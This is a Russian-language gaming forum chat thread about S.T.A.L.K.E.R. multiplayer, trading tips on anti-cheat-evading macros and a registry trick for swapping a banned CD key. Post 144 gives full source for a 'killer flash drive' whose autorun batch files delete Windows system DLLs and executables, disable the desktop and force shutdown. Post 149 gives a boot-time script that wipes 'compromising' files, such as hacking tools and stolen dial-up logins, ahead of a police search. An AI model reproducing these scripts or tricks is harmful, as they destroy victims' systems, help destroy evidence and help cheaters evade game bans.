Rambler's Top100

AVANTURE

Объявление

Сайт доступен по адресу
http://avanture.org.ua
http://forum.avanture.org.ua
Приглашаем всех кто решил остаться с нами на "АВАНТЮРУ"

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » AVANTURE » Лабуда » Болталка


Болталка

Сообщений 121 страница 150 из 220

121

За битый архив извините но программа очень хорошая единственное что магазин пропускаешь как с обычным макросом и скоростей маловато но плюс ее в том что при разных лагах можно сделать стрельбу очередью и контролер меня с ней не пасет

+2

122

Ivan Procent написал(а):

За битый архив извините но программа очень хорошая единственное что магазин пропускаешь как с обычным макросом и скоростей маловато но плюс ее в том что при разных лагах можно сделать стрельбу очередью и контролер меня с ней не пасет

ЕЩЕ : +(плюс) в том, что освобождается кнопка 7 на Х7. Непрограмируемая левая кнопка получает программу равную макросу. И те кто не имеют "Макросную" Мышку могут попробовать прелесть пользования макроса.
          - (минус) в том , что новый контролёр , в целесообразном режиме этой прожки, таки видит и выбрасывает счастливого пользователя этого (почти) макроса.

0

123

я на нужный режим ставлю и не выбрасывает только скорость стрельбы меньше той которая с макросом

0

124

Ivan Procent написал(а):

я на нужный режим ставлю и не выбрасывает только скорость стрельбы меньше той которая с макросом

При высоком пинге нужный режим теряет ценность как " непалимый макрос ".

Отредактировано vladimir (2010-04-09 16:02:12)

0

125

У меня максимальный пинг 80-90) непальмы макрос будет при таком пинге работать?

0

126

Ivan Procent написал(а):

У меня максимальный пинг 80-90) непальмы макрос будет при таком пинге работать?

А у меня, к сожалению , хорошие сервера с пингом от 100 и выше и получается мне эта прожка не очень подходит.  :dontknow:

А ВОТ С ЭТИМ ВЫРАЖЕНИЕМ  [реклама вместо картинки] Я КАТЕГОРИЧЕСКИ НЕ СОГЛАСЕН !!!  :rofl:

Отредактировано vladimir (2010-04-09 16:27:56)

0

127

самый частый и стабильный пинг у меня 60 при нем контролер не будет кикать если я с нового макроса стрелять БУДУ?

0

128

Ivan Procent написал(а):

я на нужный режим ставлю и не выбрасывает только скорость стрельбы меньше той которая с макросом

Ну ка пожалуйста по подробней как в сталкере ты выставляешь нужный режим. У меня не получается!!!! :dontknow:

0

129

konov@l
стрелка вверх - увеличить скорость стрельбы
стрелка вниз-уменьшить

^^

0

130

sakash написал(а):

стрелка вверх - увеличить скорость стрельбы
стрелка вниз-уменьшить

СПС я уже понял!!!!

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

77shustrik сегодня написал
У меня вопрос как я знаю банят по CD-KEY, а если войти на сервер с чистым CD-KEY и на всякий случай подменить его на баненый через реестр, то какой CD-KEY увидит админ? Тот с каким заходил, или второй?

Вот если все это реально то как сделать то? ( Желательно обяснить на пальцах)

Отредактировано konov@l (2010-04-14 11:39:07)

0

131

konov@l написал(а):

77shustrik сегодня написал
У меня вопрос как я знаю банят по CD-KEY, а если войти на сервер с чистым CD-KEY и на всякий случай подменить его на баненый через реестр, то какой CD-KEY увидит админ? Тот с каким заходил, или второй?

Вот если все это реально то как сделать то? ( Желательно обяснить на пальцах)

ПУСК > выполнить > regedit > HKEY_LOCAL_MACINE > SOFTWARE > GSC Game World > STALKER-COP > InstallCDKEY > изменить > вставляешь ключ !
http://4put.ru/pictures/small/23/72220.jpg
Красным обведен ключ.
Если не найдешь, то сделай так: ПУСК > выполнить > regedit > HKEY_LOCAL_MACINE и нажми F3 в поиске вставь InstallCDKEY

Отредактировано 77shustrik (2010-04-14 12:51:12)

0

132

77shustrik написал(а):

ПУСК > выполнить > regedit > HKEY_LOCAL_MACINE > SOFTWARE > GSC Game World > STALKER-COP > InstallCDKEY > изменить > вставляешь ключ !
http://4put.ru/pictures/small/23/72220.jpg
Красным обведен ключ.
Если не найдешь, то сделай так: ПУСК > выполнить > regedit > HKEY_LOCAL_MACINE и нажми F3 в поиске вставь InstallCDKEY

хы подмена ключа эт прикольно :rolleyes:
НО вот я тугодум и не могу допереть когда водить ключ вреастар (когда в игре или перед запуском игры)...по подробней пожалуста :question:
И еще действует такая же подмена ключа на ЧН?

0

133

sakash написал(а):

НО вот я тугодум и не могу допереть когда водить ключ вреастар (когда в игре или перед запуском игры)...по подробней пожалуста :question:
И еще действует такая же подмена ключа на ЧН?

В ЧН не пробовал. А вот в ЗП менял, идея такая, сначала заходишь на сервер с чистым ключом (потому как с забаненым не пустят) через Alt+Tab выходишь из игры (игра при этом включена остается) и меняешь ключ в реестре, и снова в игру. Но это только не проверенная идея :dontknow: Но если работает, то думаю будет весело. :cool:  :crazyfun:

Отредактировано 77shustrik (2010-04-14 15:24:01)

0

134

77shustrik написал(а):

В ЧН не пробовал. А вот в ЗП менял, идея такая сначала заходишь на сервер с чистым ключом (потому как с забаненым не пустят) через Alt+Tab выходишь из игры (игра при этом включена остается) и меняешь ключ в реестре, и снова в игру. Но это только не проверенная идея :dontknow: Но если работает, то думаю будет весело

Эт так можно до бесконечности тогда водить любые ключи))) и доставать админов))
На будет проверь на деле так ли оно все http://s51.radikal.ru/i134/1004/9b/a57f2ddb388c.gif

0

135

)фантом( написал(а):

да идея хорошая но древняя думаеш там в GSS такие тупорезы за компами седят???
ладно к делу я так пробывал но когда на серве рестарт делают то я с забаненным ключом вылетаю!!! так-что забейте на эту идею!!!

То есть   -  все реально работает!!!
А значит на серверах ( суточниках ) то есть   тех где реостарт, или раз в сутки, или после обрушения, или вылета все сработает и при "наглой" игре ключ не забанят. Я правильно понял!?!

Если так то эту уловку можно смело использовать на больших картах ( Кордон, НИИ Агропром, Окрестности Юпитера......) на них реостат крайне редко - НАИГРАТЬСЯ УСПЕЕШЬ.

ОДИН ТОЛЬКО ВОПРОС ОСТАЕТСЯ ОТКРЫТЫМ - ЕСЛИ ВСЕ ТАКИ " БОНАКВА" :insane: ТО КАКОЙ КЛЮЧ УЛЕТИТ?

Отредактировано konov@l (2010-04-15 12:29:24)

0

136

konov@l написал(а):

ОДИН ТОЛЬКО ВОПРОС ОСТАЕТСЯ ОТКРЫТЫМ - ЕСЛИ ВСЕ ТАКИ " БОНАКВА"  ТО КАКОЙ КЛЮЧ УЛЕТИТ?

Нужно договориться с админом Черемухи Одессы запаролить сервер и протестировать этот вариант с подставным ключом.

0

137

vladimir написал(а):

Нужно договориться с админом Черемухи Одессы запаролить сервер и протестировать этот вариант с подставным ключом.

Можно не договариваться,проверил я эту манну небесную-итог БАНАН  :angry:  :hobo:

0

138

frolovvv79 написал(а):

Можно не договариваться,проверил я эту манну небесную-итог БАНАН  :angry:  :hobo:

Плохо конечно, что идея с ключом не сработала, но я конечно особой надежды и сам не теплил....

0

139

ПРИЯТНАЯ НОВОСТЬ ДЛЯ ЗЛЫХ ЧИТЕРОВ. С НОВЫМИ ЧИТАМИ РАРУСА  СТАЛО БЫСТРЕЕ И УДОБНЕЕ ВАЛИТЬ НЕХОРОШИЕ СЕРВЕРА С НОВЫМ КОНТРОЛЁРОМ. :D
ТАК ЧТО  АНТАРЕС , НЕ  СПА-А-А-ТЬ !!!

Отредактировано vladimir (2010-04-16 13:29:13)

0

140

Есть три типа тупорылых людей:

3 - й тип:  ТУПЕНЬКИЕ  ( путают где лево, а где право; плох запоминают сложные слова (синхрофазотрон - например); сосут палец когда страшно и т.д.)

2 -й  тип:  ТУПОРЫЛЫЕ ( плохо говорят на иностранных языках ( русский, украинский)- все больше на своем родном; пугаются - когда смотрят в зеркало; ковыряясь в зубах пытаются что то сказать - потому  и ходят постоянно с забинтоваными пальцами и т.д.)

3 -й  тип: МЕГО-ТУПАРЫЛЫЕ  ( этих реально заносят в книгу рекордов Гинеса в раздел - человек который в течении 15 часов не вынимал пальцы из розетки т.к. ЗАБЫЛ; Левый глаз постоянно дергается, а правый не постоянно ит.д.)

Так вот объясните мне мега-тупарылому созданию какие настройки в программе Fraps 3.0.1.10506 Rus -  выложеной по этой ссылке S O F T  (коментарии запрещены!!!) нужно сделать чтобы она писала со звуком или чего ей не хватает. Или чего не хватает мне. Я от нее устал  :mad:

0

141

konov@l

Все просто http://s006.radikal.ru/i214/1004/7b/ce7bc457b419.jpg

На вкладке видео ставишь галочку на запись звука и Определять источник )) ну как на картинке вообщем) у меня стоит так и все пашет и записывает http://s55.radikal.ru/i148/1004/c7/76a433bbbcf2.gif

0

142

sakash написал(а):

Все просто

Да вот именно что просто я эти установки тоже ставил - звук не записывается :angry:
Может у меня что с аудио  настройками на компе?
У кого какие идеи,,,,

0

143

konov@l написал(а):

Может у меня что с аудио  настройками на компе?

Иенно с ними,уже не помню как я с этой проблемой разобрался!! методом тыка и то для начала чтоб записать, делал тест пробный, то пишет со звуком то не пишет ухх ,блин.

0

144

Флешка-Убийца http://s56.radikal.ru/i151/1004/a7/47d43147cc89.gif

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________

в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe
______________________________

в Dead.BAT пишем:
@echo off
cp Флешка:AUTOEXEC.BAT C:
msg * "Dead" >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
shutdown -s -t 1 -c "lol" -f >nul
______________________________

в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT
______________________________

готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.

______________________________

Удачи ;)

Мож каму пригодитса  http://i003.radikal.ru/1004/d6/97305216fec2.gif

Стащено От Сюда http://i080.radikal.ru/1004/4d/5dd3cd983e99.gif

+1

145

sakash написал(а):

как это работает:Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.

КРУТО !!!!!!  :cool:  У меня есть еще одна фишка. Берешь компьютер (который тебе больше не пригодится) открываешь окно и выбрасываешь комп. с этажа не ниже 2го. :rofl:    После завтра ко мне зайдет Джеймс Бонд обязательно покажу ему флешку-убийцу, ему пригодится. 8-)

+1

146

Обращение к администрации!
Содержит не нормативную лексику по этому детям до 18 и людям со слабыми нервами не читать!!!

Свернутый текст

Пожалуйста назовите ту "паскудную сволочь" которая зарегистрировалась под 2000 номером и до сих пор не поставила  "магарыч" или хотя бы  выложила в YU TUB свою очень счастливую и довольную морду лица  :crazyfun:  :D  :crazyfun: ЗА ОБЛАДАТЕЛЯ ЭТОГО ФАРТОВОГО НОМЕРА Я ИСКРЕННЕ РАД

Отредактировано konov@l (2010-04-26 23:04:11)

+1

147

Cheater№1 написал(а):

Привет всем !! нужен МАКРОС на отдачу от нового КОНТРОЛЕРА а у вас надо набрать 25 сообщений я Замучаюсь набирать эти сообщения дайте ссылку на ДЕПОЗИТЕ или на чем нить другом

НУ А МНЕ  ПЛИЗ!  :flirt: ПЛИЗ! :flirt: ПЛИЗ! , НАЛОЖЕННЫМ ПЛАТЕЖОМ, КЛЮЧИ ОТ ВАШИХ КВАРТИР, ГДЕ ДЕНЬГИ ЛЕЖАТ !!!  (НУ НЕ ОХОТА МНЕ РАБОТАТЬ !!!  :mad: )

0

148

БРАТЬЯ ПО ОРУЖИЮ !!!СЕГОДНЯ ВСЕ СТАЛКЕРЫ ОТМЕЧАЮТ ПЕЧАЛЬНУЮ ДАТУ ВЗРЫВА ЧЕРНОБЫЛЬСКОЙ АС  и  ОБРАЗОВАНИЯ  З О Н Ы !!!
[youtube]http://www.youtube.com/watch?v=0yAy07rFH-s&feature=player_embedded[/youtube]

0

149

Вот еще  :D

Если ты из тех, кому по ночам снятся сотрудники ФСБ, при виде милиционера ты начинаешь усиленно шифроваться или просто хочешь, чтоб твой винчестер без лишних проблем был доступен только тебе, эта статья как раз для тебя.
Представь такую ситуацию, ты сидишь перед телеком, смотришь футбол и тут раздаётся звонок. Ты открываешь дверь и в квартиру входят несколько амбалов, представившись сотрудниками ФСБ(: Они просят тебя включить компьютер. Ты включаешь. Полазив пару минут по твоему винчестеру, они находят и твой любимый Sub7 с Обмани Соседа, и LamerDead, и кучу ворованных даил апов.
Затем заламывают тебе руку, забирают твой системник и везут вас в следственный изолятор.): Как тебе? А ведь всё могло бы быть и по-другому.
В этой статье я расскажу тебе о простеньком самодельном защитном устройстве для твоего компа от посягательств посторонних людей.

Ладно, начнём.
Прежде всего все компрометирующие тебя данные ты должен хранить в одном каталоге. (я рассматриваю именно такой случай). Возможно присутствие неограниченного числа подкаталогов в нём. Далее cкопируй свой autoexec.bat в файл autoexec.bak (тоже в корень диска С). Теперь открой autoexec.bat блокнотом и добавь в конец строчку:
load PCI Steering (PCIIRQHOLDER
Не пугайся, она такая чудная, чтоб все подумали, что она чисто системная. Далее посмотри, есть ли в твоём autoexec'e cтрочка вроди:
set PATH=список_папок
Вместо "список_папок" там должна быть прописана папка с твоей виндой и ещё пара. Если такого вообще не наблюдается, добавь строчку:
set PATH=%windir%command
Всё, мы приготовились к внедрению самого механизма. Теперь cоздай в каталоге "c:windowscommand" файл load.bat. Его содержание должно быть таким:

@echo off
echo --- By windows setup ---
@choice /c:za /N /T:a,5
@if errorlevel 2 goto its_ok
@deltree /y каталог_с_прогами_который_нужно_удалить
@cls
@deltree /y %windir%Tempor~1*.* > dead
@deltree /y %windir%Tempor~1dead
@cls
@deltree /y %windir%History*.* > dead
@deltree /y %windir%Historydead
@cls
@deltree /y %windir%Cookies*.txt > dead
@deltree /y %windir%Cookiesdead
@cls
@deltree /y %windir%TEMP*.* > dead
@deltree /y %windir%TEMPdead
@cls
@deltree /y c:autoexec.bat
@cls
@ren c:autoexec.bak autoexec.bat
@deltree /y %windir%commandload.bat
:its_ok

Всё. Теперь перегружай комп и наслаждайся.
Фишка вся в том, что при загрузке компа, как только ты увидишь на экране надпись "--- By windows setup ---" ты должен будешь нажать на кнопку "Z". Если в течение пяти секунд ты на неё не нажмёшь, сотрётся каталог с твоими прогами и почистятся папки с временными инет файлами (типа логов). Как тебе? =) Тоесть ты один знаешь, как избежать этого дестроя. И самое главное, что сам дестрой будет проходить совершенно незаметно и по завершению оного данный механизм самоуничтожется. Тоесть никто и не узнает, что вообще что-то на твоём компе было (подредактированный autoexec.bat тоже заменяется на старый).
Если тебя ломает при каждой загрузке нажимать на Z, можешь сделать так, чтобы наоборот при нажатии на кнопку происходил дестрой. Тоесть у тебя будет 5 сек, чтобы нажать на кнопку "A" (именно A, а не Z) для уничтожения компромата. Для этого замени 4ую строчку на "@choice /c:za / N /T:z,5"
Если для тебя 5 сек это маломного, то просто подредактируй третью строчку cкрипта (замени там число 5 на более подходящее).
Надеюсь что после прочтения этой статьи у вас проблем с ФСБшниками не будет ((((:
:)

0

150

В рубрике  читы  пост № 56  ( кому не ясно то здесь: Читы)
seg@  написал:

Убираешь сглаживание чуток, в настройках видюхи и все -_- такие скрины будут прилетать.... проверенно!!!! И ххх докажешь,как уже выше подметили это может быт косяк видеокарты и дров!

Кто в этом хорошо понимает может объяснить два момента:
1. Сглаживание убирать в настройках игры, или все таки  настройках самой видеокарты  ( если второе то как?)
2. ЧУТОК - это сколько  ( 1/3,  2/3 от максимума)

И кто нибудь подскажет где можно посмотреть ( то есть в каких настройках) чтобы исправить проблему возникшую у меня.  Проблему я описывал в этой теме пост № 141 и 142

0


Вы здесь » AVANTURE » Лабуда » Болталка